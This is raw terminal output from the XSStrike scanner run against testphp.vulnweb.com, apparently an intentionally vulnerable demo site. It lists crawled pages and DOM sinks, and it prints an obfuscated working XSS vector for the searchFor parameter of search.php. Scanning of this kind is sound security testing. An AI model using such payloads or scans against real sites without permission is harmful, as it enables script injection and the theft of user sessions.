
	XSStrike v3.1.5

 Crawling the target 
 Parsing                                           Parsing login.php                                 Parsing cart.php                                  Parsing hpp/                                      Parsing guestbook.php                             Parsing AJAX/index.php                            Parsing categories.php                            Parsing artists.php                               Parsing userinfo.php                              Potentially vulnerable objects found at http://testphp.vulnweb.com/AJAX/index.php 
------------------------------------------------------------
14  		*cd.innerHTML* = inner;17  		*id.innerHTML* = '';44  		*id.innerHTML* = inner;77  			*xd.innerHTML* = httpreq.responseText;109 		*document.cookie* = "mycookie=3";------------------------------------------------------------
[++] Vulnerable webpage: http://testphp.vulnweb.com/search.php?test=query 
[++] Vector for searchFor: <DEtAiLs%0doNPoinTEreNtER%0a=%0aa=prompt,a()// 
 Progress: 9/9 
